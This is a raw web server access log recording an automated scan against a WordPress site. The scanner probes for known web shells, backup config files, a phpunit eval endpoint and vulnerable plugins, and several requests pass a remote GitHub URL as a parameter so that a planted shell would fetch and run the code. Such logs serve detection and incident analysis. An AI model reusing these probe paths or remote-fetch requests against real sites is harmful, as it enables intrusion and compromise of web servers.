-	21:44:29	-0600	GET /style.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:44:40	-0600	GET /moduless.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:44:52	-0600	GET /wp-content/plugins/t_file_wp/t_file_wp.php?test=hello HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:45:04	-0600	GET /admin.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:45:17	-0600	GET /index.php?3x=3x HTTP/1.1	403	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:45:27	-0600	GET /boom.php?x HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:45:36	-0600	GET /wp-content/plugins/backup_index.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:45:45	-0600	GET /wp-content/db_cache.php HTTP/1.1	404	7173	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:45:54	-0600	GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:46:05	-0600	GET /xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:46:14	-0600	GET /wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:46:25	-0600	GET /larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:46:36	-0600	GET /th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:46:46	-0600	GET /alfindex.php HTTP/1.1	404	7173	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:46:57	-0600	GET /alfa.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:47:09	-0600	GET /wp-booking.php HTTP/1.1	404	7173	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:47:18	-0600	GET /cindex.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:47:30	-0600	GET /wp-content/wp-1ogin_bak.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:47:42	-0600	GET /wp-1ogin_bak.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:47:54	-0600	GET /wp-includes/fonts/css.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:48:07	-0600	GET /wp-includes/css/css.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:48:18	-0600	GET /old-index.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:48:26	-0600	GET /config.bak.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:48:38	-0600	GET /wp-admin/config.bak.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:48:46	-0600	GET /wp-content/config.bak.php HTTP/1.1	404	7173	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:48:58	-0600	GET /wp-includes/config.bak.php HTTP/1.1	404	7173	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:49:06	-0600	GET /wp-content/themes/config.bak.php HTTP/1.1	404	7173	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:49:15	-0600	GET /wp-content/plugins/config.bak.php HTTP/1.1	404	7173	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:49:25	-0600	POST /wp-includes/css/wp-config.php HTTP/1.1	404	7173	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:49:38	-0600	GET /wp-content/plugins/ubh/up.php HTTP/1.1	404	7173	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:49:50	-0600	GET /wp-includes/wpconfig.bak.php?act=sf HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:50:01	-0600	GET /wp-content/plugins/wpconfig.bak.php?act=sf HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:50:13	-0600	GET /haders.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:50:25	-0600	GET /wp-content/wp-old-index.php?action=login&pass=-1&submit= HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:50:34	-0600	GET /legion.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:50:45	-0600	GET /wp-content/mu-plugins/db-safe-mode.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:50:55	-0600	GET /wp-includes/lfx.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:51:05	-0600	GET /wp-includes/small.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:51:15	-0600	GET /up.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:51:26	-0600	GET /upload.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:51:37	-0600	GET /config.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:51:48	-0600	GET /test.php?Ghost=send HTTP/1.1	404	7173	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:51:59	-0600	GET /wp-content/langar.php HTTP/1.1	404	7173	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:52:12	-0600	GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:52:22	-0600	GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php HTTP/1.1	404	7173	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	21:52:34	-0600	GET /wp-content/plugins/wpdiscuz/themes/default/style-rtl.css HTTP/1.1	403	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
